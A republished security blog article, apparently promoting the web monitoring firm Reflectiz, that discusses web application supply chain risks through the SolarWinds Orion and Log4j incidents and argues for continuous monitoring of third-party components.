Do You Really Trust Your Web Application Supply Chain?

We Keep you Connected

Do You Really Trust Your Web Application Supply Chain?

It’s the modular nature of modern web applications that has made them so effective. They can call on dozens of third-party web components, JS frameworks, and open-source tools to deliver all the different functionalities that keep their customers happy, but this chain of dependencies is also what makes them so vulnerable.
Many of those components in the web application supply chain are controlled by a third party—the company that created them. This means that no matter how rigorous you were with your own static code analysis, code reviews, penetration testing, and other SSDLC processes, most of your supply chain’s security is in the hands of whoever built its third-party components.
With their huge potential for weak spots, and their widespread use in the lucrative ecommerce, financial and medical industries, web application supply chains present a juicy target for cyber attackers. They can target any one of the dozens of components that their users trust to infiltrate their organizations and compromise their products. Software, third-party libraries, and even IoT devices are routinely attacked because they offer a way of gaining privileged access to systems while remaining undetected. From there, attackers can issue Magecart and web skimming attacks, ransomware, commit commercial and political espionage, use their systems for crypto mining, or even just vandalize them.
In December 2020, a supply chain attack was discovered that dwarfs many others in terms of its scale and sophistication. It targeted a network and applications monitoring platform named Orion that’s made by a company called SolarWinds. The attackers had covertly infiltrated its infrastructure and used their access privileges to create and distribute booby-trapped updates to Orion’s 18,000 users.
When those customers­ installed the compromised updates from SolarWinds, the attackers gained access to their systems and had free reign within them for weeks. U.S. government agencies were compromised prompting investigations that pointed the finger towards a Russian state operation.
This devastating supply chain attack can happen in web environments too, and it emphasizes the need for a comprehensive and proactive web security solution that will continuously monitor your web assets.
Standard security processes did not help with SolarWinds and they cannot monitor your entire supply chain. There are many potential risk areas that they will simply miss, such as:

In these and many other situations, standard security tools will fall short.
Another one of those situations arose when a zero-day vulnerability was discovered in the widely used Log4j Java-based logging utility. Millions of computers owned by businesses, organizations, and individuals around the world use Log4j in their online services. A patch was released three days after the vulnerability was discovery in 2021, but in the words of Sophos senior threat researcher Sean Gallagher:

The vulnerability allows hackers to take control of devices that are susceptible to the exploit through Java. Again, they can then use these devices for illegal activities such as cryptocurrency mining, creating botnets, sending spam, establishing backdoors, Magecart, and launching ransomware attacks.
After it was disclosed, Check Point reported millions of attacks initiated by hackers, and some researchers observed a rate of over 100 attacks per minute and attempted attacks on over 40% of business networks around the world.
Given that your web application supply chain could have already been compromised via the Log4J vulnerability, the need for a proactive continuous monitoring solution becomes even more urgent.
One of these solutions is a web security company called Reflectiz. Its platform detected the Log4J vulnerability in Microsoft’s Bing domain in an early stage, which they promptly patched. Then Reflectiz proactively scanned thousands of websites and services to identify other Log4J vulnerabilities. One significant vulnerability was found in Microsoft’s UET component, affecting millions of users on various platforms. Reflectiz notified and collaborated with clients and prospects to mitigate risks, adhering to responsible disclosure procedures by informing Microsoft and sharing their findings. They stress the ongoing nature of the Log4J event and advocate for organizations to secure their websites by addressing third-party vulnerabilities.
The interplay of your in-house and third-party web components in your web application supply chain makes for a dynamic environment that’s constantly in flux. A continuously changing environment calls for a continuous monitoring solution that alerts you to suspicious behaviors in every element of your web application supply chain. Through rigorous continuous monitoring security teams can:

Sign up for free and start receiving your daily dose of cybersecurity news, insights and tips.

source

GET THE LATEST UPDATES, OFFERS, INFORMATION & MORE